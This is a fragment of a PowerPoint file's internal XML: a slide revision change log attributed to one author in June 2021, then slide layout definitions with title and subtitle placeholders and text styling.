            <pc:sldMk cId="2418320045" sldId="481"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:47:11.504" v="2395"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1683867025" sldId="482"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:17:00.362" v="2200" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="2" creationId="{370CD65D-A6BF-459B-B957-130607D9A183}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:17:00.362" v="2200" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="3" creationId="{14E221CD-1194-403A-B19C-68DC832EA380}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:21:15.195" v="2236" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="4" creationId="{7DAB109A-81C9-4DD3-8487-BE9AFF4EB873}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:45:45.826" v="2376" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="10" creationId="{E2F4B83A-F831-40D4-82DA-F49661823B00}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:46:09.969" v="2392" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="13" creationId="{23EFB75A-E6AF-44D0-96A9-AE129FC68B33}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:22:58.690" v="2240" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:picMk id="6" creationId="{590C8BB6-78DF-41E4-BDD5-345FFE58E89A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:45:41.399" v="2375" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:picMk id="8" creationId="{1F7C72D0-D62A-499C-A6B8-7C849AB1212E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:45:33.106" v="2374" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:picMk id="12" creationId="{C1B437B6-903E-460C-9EB2-20C06AB05D3D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:56:48.230" v="2412" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2787378180" sldId="483"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:47:11.504" v="2395"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3022927922" sldId="484"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:27:29.973" v="2262" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:spMk id="2" creationId="{2B982A6D-5381-41E2-B506-D53AEA7933D0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:37:26.738" v="2316" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:spMk id="11" creationId="{F773C795-1940-4E5A-899F-EA8CDF1F6AE5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:38:09.646" v="2359" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:spMk id="12" creationId="{CF0E252C-8AA9-4860-AF85-370DFD079DB5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:36:52.734" v="2295" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:picMk id="4" creationId="{E85F83B3-8302-4D0C-B0C7-D3AD121DF968}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:36:50.381" v="2294" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:picMk id="6" creationId="{707C8B56-5CBF-4DE9-8088-9CA3B9209579}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:35:23.635" v="2278" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:picMk id="8" creationId="{E0CD9D1B-1E66-4C9A-A04E-06E607F82934}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:36:26.044" v="2293" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:picMk id="10" creationId="{B08BF884-CDEF-4D7A-914C-9F0D4CEB8299}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:39:20.031" v="2363" actId="1582"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:cxnSpMk id="14" creationId="{BDCC988F-E9BC-43F2-81CE-1E02CB63E18F}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:46:49.132" v="2393" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="695818154" sldId="485"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:44:33.674" v="2367" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="695818154" sldId="485"/>
            <ac:spMk id="2" creationId="{C9749E0C-3927-40D0-B166-F7DF86ACDCF8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:05:31.851" v="2530" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1979037057" sldId="485"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:01:12.539" v="2426" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="2" creationId="{E353B482-F9B1-4425-BB0E-1FBC780FF119}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:01:12.539" v="2426" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="3" creationId="{BDE0E3D6-0581-4B95-841A-7EB7C500F166}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:01:18.219" v="2428" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="4" creationId="{74134226-8147-4CB6-907D-194E579F0C6F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:01:18.219" v="2428" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="5" creationId="{604A5F76-9478-46DE-81F4-F60B4DC48618}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:02:14.978" v="2432"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="6" creationId="{6A5364ED-6372-42B0-8F40-B24AA14AA454}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:04:24.664" v="2517" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="11" creationId="{8A39246C-5DBA-4DED-9015-D17CDBB97641}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:04:24.664" v="2517" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="12" creationId="{09D4ED7B-C96A-4351-AAAA-9646E192FBFD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:05:17.718" v="2528" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="14" creationId="{8C2B2658-1045-4FCC-BBFF-9F50A6C9B15C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:04:24.664" v="2517" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:picMk id="8" creationId="{D6642376-3771-4A23-988A-14E881E82403}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:04:24.664" v="2517" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:picMk id="10" creationId="{9EF32C83-75BB-4834-92CD-1D2764C7758A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:05:31.851" v="2530" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:picMk id="13" creationId="{2BDA334F-F2DA-484C-B219-4E9F22B21626}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:01:48.822" v="2534" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="229412847" sldId="486"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:01:46.722" v="2533" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="229412847" sldId="486"/>
            <ac:picMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:01:48.822" v="2534" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="229412847" sldId="486"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:01:45.159" v="2532" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="229412847" sldId="486"/>
            <ac:picMk id="1026" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:08:17.943" v="2575" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="127162036" sldId="487"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:04:38.120" v="2571" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="127162036" sldId="487"/>
            <ac:spMk id="2" creationId="{E9795CE5-4D04-4CBA-8767-87D7588611F2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:08:17.943" v="2575" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="127162036" sldId="487"/>
            <ac:picMk id="4" creationId="{2039DE48-F833-4C4D-AEA6-65EC61529D54}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:22:01.874" v="2619"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1436574554" sldId="488"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:20:19.941" v="2615" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1436574554" sldId="488"/>
            <ac:spMk id="2" creationId="{A4717730-4F34-4130-AAF8-EBC15D008936}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:21:44.888" v="2618" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1436574554" sldId="488"/>
            <ac:picMk id="4" creationId="{25A627BB-5496-40EF-8103-AF171432D7F1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:32:29.686" v="2637"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3579863255" sldId="489"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:32:24.944" v="2636" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3579863255" sldId="489"/>
            <ac:spMk id="2" creationId="{DBCCA8B4-61C1-4A38-8741-45E1A46ADE0F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:32:29.686" v="2637"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3579863255" sldId="489"/>
            <ac:spMk id="3" creationId="{4FB77B5E-3139-4C66-8935-9AA9B15E530D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:32:24.944" v="2636" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3579863255" sldId="489"/>
            <ac:spMk id="4" creationId="{774A7D27-F957-4AEB-B39F-C8C34744C674}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T19:33:16.195" v="2639" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="366514627" sldId="49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658D5F-65FB-4E17-9D5B-8CF1DE5A98DF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/1/2021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49544B-F866-4ED0-8997-24601187AE87}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1595199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263717A-E3C1-4BED-ABE0-B7069385E023}"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66646" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3FE6F5B0-BCF1-4291-802C-4ED5F9057036}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82117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17696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9590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92"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4281247" y="2215683"/>
            <a:ext cx="7068800" cy="1546400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4281180" y="3818903"/>
            <a:ext cx="7068800" cy="1046400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
